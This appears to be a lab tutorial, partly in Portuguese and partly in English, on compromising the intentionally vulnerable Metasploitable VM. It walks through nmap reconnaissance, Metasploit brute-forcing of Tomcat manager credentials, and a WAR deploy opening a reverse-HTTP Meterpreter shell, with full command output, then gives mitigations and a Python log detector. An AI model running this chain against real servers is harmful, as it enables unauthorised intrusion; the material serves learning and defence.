MAC Address: E8:11:32:AD:57:9D (Samsung Electronics Co.)
Nmap done: 256 IP addresses (9 hosts up) scanned in 4.68 seconds
Opa bastante pcs, lab todo ligado
E agora? Qual será o nosso alvo?
Novamente com o nmap vamos escanear os ips até encontrar nosso alvo
attacker@blackoutlabs:~# nmap -A 192.168.0.108
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 20:05 BRT
Nmap scan report for 192.168.0.108
Host is up (0.00062s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17 14:07:45
|_Not valid after: 2010-04-16 14:07:45
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
|_http-title: Site doesn’t have a title (text/html).
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
MAC Address: 08:00:27:45:2C:E8 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 – 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-08-24 20:06:02 UTC-4
TRACEROUTE
HOP RTT ADDRESS
1 0.62 ms 192.168.0.108
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.20 seconds
Opa parece que achamos! Não foi de primeira, levei um tempinho para achar ele ali hehe…
Agora temos algumas informações interessantes. Temos o Apache Tomcat 5.5 rodando na porta 8180 (lembre-se disso). Pronto! Já sabemos onde ele está agora vamos brincar com ele um pouco.
Explorando
Para explorar-mos esse serviço vamos usar o Framework Metasploit e procurar algum exploit para o tomcat.
attacker@blackoutlabs:~# msfconsole
_ _
/ \ / \ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
+ — – =[metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — – =[ 927 exploits - 499 auxiliary - 151 post]
+ — – =[ 251 payloads - 28 encoders - 8 nops]
msf> search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 00:00:00 UTC normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 00:00:00 UTC normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 00:00:00 UTC excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
Opa temos alguns exploits interessantes. Vamos usar o tomcat_mgr_login para fazer um bruteforce. Antes de invadir precisamos de um user/pass válido.
msf> use auxiliary/scanner/http/tomcat_mgr_login
msf (tomcat_mgr_login)> show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
—- ————— ——– ———–
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE /opt/metasploit/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
Bom, esse exploit precisa de bastante coisas. Vamos acrescentar o host que encontramos antes, a porta (lembra qual era? Sempre preste atenção nisso), caso ele não encontre com os usuarios e senhas padrão vamos acrescentar nossas wordlists em PASS_FILE e USER_FILE e caso ele não encontre no diretório padrão precisaremos mudar isso também em URI.
msf (tomcat_mgr_login) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf (tomcat_mgr_login) > set RHOSTS 192.168.0.108
RHOSTS => 192.168.0.108
msf (tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_login) > exploit
[*] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - Trying username:'admin' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [01/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - Trying username:'manager' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [02/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - Trying username:'role1' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [03/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - Trying username:'root' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [04/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [05/45] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.0.108:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - Trying username:'both' with password:'both'
[-] 192.168.0.108:8180 TOMCAT_MGR - [06/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.0.108:8180 TOMCAT_MGR - [07/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.0.108:8180 TOMCAT_MGR - [08/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.0.108:8180 TOMCAT_MGR - [09/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.0.108:8180 TOMCAT_MGR - [10/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - Trying username:'xampp' with password:'xampp'
[-] 192.168.0.108:8180 TOMCAT_MGR - [11/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [12/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.0.108:8180 TOMCAT_MGR - [13/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.0.108:8180 TOMCAT_MGR - [14/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - Trying username:'admin' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [15/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - Trying username:'admin' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [16/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - Trying username:'admin' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [17/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - Trying username:'admin' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [18/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - Trying username:'admin' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [19/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - Trying username:'manager' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [20/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - Trying username:'manager' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [21/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - Trying username:'manager' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [22/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - Trying username:'manager' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [23/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - Trying username:'manager' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [24/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - Trying username:'role1' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [25/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - Trying username:'role1' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [26/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - Trying username:'role1' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [27/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - Trying username:'role1' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [28/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - Trying username:'role1' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [29/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - Trying username:'root' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [30/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - Trying username:'root' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [31/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - Trying username:'root' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [32/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - Trying username:'root' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [33/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - Trying username:'root' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [34/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - Trying username:'both' with password:'admin'
[-] 192.168.0.108:8180 TOMCAT_MGR - [35/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - Trying username:'both' with password:'manager'
[-] 192.168.0.108:8180 TOMCAT_MGR - [36/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - Trying username:'both' with password:'role1'
[-] 192.168.0.108:8180 TOMCAT_MGR - [37/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - Trying username:'both' with password:'root'
[-] 192.168.0.108:8180 TOMCAT_MGR - [38/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - Trying username:'both' with password:'tomcat'
[-] 192.168.0.108:8180 TOMCAT_MGR - [39/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - Trying username:'both' with password:'s3cret'
[-] 192.168.0.108:8180 TOMCAT_MGR - [40/45] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Nice! Looking closely at this output, the default wordlist already found a working user:pass combination (tomcat:tomcat), so we won't need a wordlist of our own in this case. It also confirmed that the default directory is valid, so there is no need to test another one. Now let's look for the actual exploit.
msf (tomcat_mgr_login) > search tomcat
Matching Modules
================
Name                                                Disclosure Date          Rank       Description
----                                                ---------------          ----       -----------
auxiliary/admin/http/tomcat_administration                                   normal     Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal                                   normal     Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal                                normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_tomcat_transfer_encoding  2010-07-09 00:00:00 UTC  normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos                2011-12-28 00:00:00 UTC  normal     Hashtable Collisions
auxiliary/scanner/http/tomcat_enum                                           normal     Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login                                      normal     Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy                2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
The exploit we are going to use is mgr_deploy, with a reverse_http payload. Let's fill it in with the information we already have.
msf (tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf (tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD                   no        The password for the specified username
PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
Proxies                    no        Use a proxy chain
RHOST                      yes       The target address
RPORT     80               yes       The target port
USERNAME                   no        The username to authenticate as
VHOST                      no        HTTP server virtual host
Exploit target:
Id  Name
--  ----
0   Automatic
msf (tomcat_mgr_deploy) > set RHOST 192.168.0.108
RHOST => 192.168.0.108
msf (tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf (tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf (tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf (tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name                            Disclosure Date  Rank    Description
----                            ---------------  ----    -----------
generic/custom                                   normal  Custom Payload
generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline
msf (tomcat_mgr_deploy) > set PAYLOAD java/meterpreter/reverse_http
PAYLOAD => java/meterpreter/reverse_http
msf (tomcat_mgr_deploy) > set LHOST 192.168.0.106
LHOST => 192.168.0.106
msf (tomcat_mgr_deploy) > exploit
[*] Started HTTP reverse handler on http://192.168.0.106:8443/
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6465 bytes as D3YHKcK8TOful.war ...
[*] Executing /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp...
[*] Undeploying D3YHKcK8TOful ...
[*] 192.168.0.108:51231 Request received for /INITJM...
Java: /INITJM
URL: "http://192.168.0.106:8443/FDnj_4IdkGPMI9c8doStx/\x00"
[*] Meterpreter session 2 opened (192.168.0.106:8443 -> 192.168.0.108:51231) at 2012-08-24 20:37:12 -0300
meterpreter >
Done! We got in. Let's run a few commands to confirm.
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > ifconfig
Interface 1
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
Interface 2
============
Name : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.0.108
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe45:2ce8
IPv6 Netmask : ::
meterpreter > shell
Process 1 created.
Channel 1 created.
$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
$ whoami
tomcat55
$ ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
$ cd /tmp
$ pwd
/tmp
$ ls
4729.jsvc_up
cache37pgy7jar
cache37pgy8jar
$ halt
halt: Need to be root
And we really are in! The whoami command shows that we are running as the tomcat55 user. We can walk around and run a few commands on the system, but we don't have many privileges, as the last command shows by answering "Need to be root". We would need to escalate privileges and get root access to do anything more.
That part is for another post, though, since this one was only meant to introduce the vulnerability and the exploits.
Avoiding the attack
OK, so I found out how to attack and where the way in is, but now what, how do I fix it?
Well, there isn't a lot to do at this point, but here it is:
- Always keep Apache Tomcat up to date
- Don't use obvious passwords
- If possible, change the manager directory to something less obvious
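On the detection side, the sequence this tutorial produced leaves a very recognisable trail in Tomcat's access log: a burst of 401s against /manager/html from one client, then a successful login, a deploy and an undeploy a few seconds later. The Python below is an added example (not from the original post or from Metasploit) that flags that pattern; the log lines, the context name and the threshold/window values are constructed for the demo, and the log format assumed is Tomcat's default "common" AccessLogValve pattern.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
# Constructed sample: a 12-guess burst, the working login, deploy, JSP hit and undeploy
# from one client, plus a single stray 401 from another client that must NOT be flagged.
SAMPLE_LOG = [
    f'192.168.0.106 - - [24/Aug/2012:20:36:{s:02d} -0300] "GET /manager/html HTTP/1.1" 401 954'
    for s in range(10, 22)
] + [
    '192.168.0.106 - tomcat [24/Aug/2012:20:36:22 -0300] "GET /manager/html HTTP/1.1" 200 13540',
    '192.168.0.106 - tomcat [24/Aug/2012:20:37:05 -0300] "PUT /manager/deploy?path=/D3YHKcK8TOful HTTP/1.1" 200 63',
    '192.168.0.106 - - [24/Aug/2012:20:37:06 -0300] "GET /D3YHKcK8TOful/qh3Q6Qaf2NVdciS7ngfbkqIBa04HxV.jsp HTTP/1.1" 200 0',
    '192.168.0.106 - tomcat [24/Aug/2012:20:37:07 -0300] "GET /manager/undeploy?path=/D3YHKcK8TOful HTTP/1.1" 200 60',
    '192.168.0.107 - - [24/Aug/2012:20:40:00 -0300] "GET /manager/html HTTP/1.1" 401 954',
]

def parse(line):
    """Return one access_log line as a dict, or None if it does not match the pattern."""
    if not (m := LOG_RE.match(line)):
        return None
    host, user, ts, method, path, status = m.groups()
    return {"host": host, "user": user, "method": method, "path": path, "status": int(status),
            "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")}

def burst(fails, threshold, window_s):
    """True if at least `threshold` failures fall inside some window_s-second span."""
    times = sorted(r["time"] for r in fails)
    return any((times[i + threshold - 1] - times[i]).total_seconds() <= window_s
               for i in range(len(times) - threshold + 1))

def detect(lines, threshold=10, window_s=300):
    """One alert per client that brute-forces /manager; notes any later login and (un)deploy."""
    per_host = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec["path"].startswith("/manager/"):
            per_host[rec["host"]].append(rec)
    alerts = []
    for host, recs in sorted(per_host.items()):
        fails = [r for r in recs if r["status"] == 401]
        if not burst(fails, threshold, window_s):
            continue
        ok = [r for r in recs if r["status"] == 200]  # requests that got through after guessing
        alerts.append({"host": host, "failed": len(fails),
                       "user": next((r["user"] for r in ok if r["user"] != "-"), None),
                       "deployed": any("/deploy" in r["path"] for r in ok),
                       "undeployed": any("/undeploy" in r["path"] for r in ok)})
    return alerts
```

Against the constructed log this yields a single alert for 192.168.0.106 with 12 failures, the user tomcat, and both the deploy and the undeploy set; a manager deploy from an unexpected client is worth an alert of its own even without the preceding burst.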
That's it for today! We've now seen 1 of the Metasploitable flaws; more are coming soon.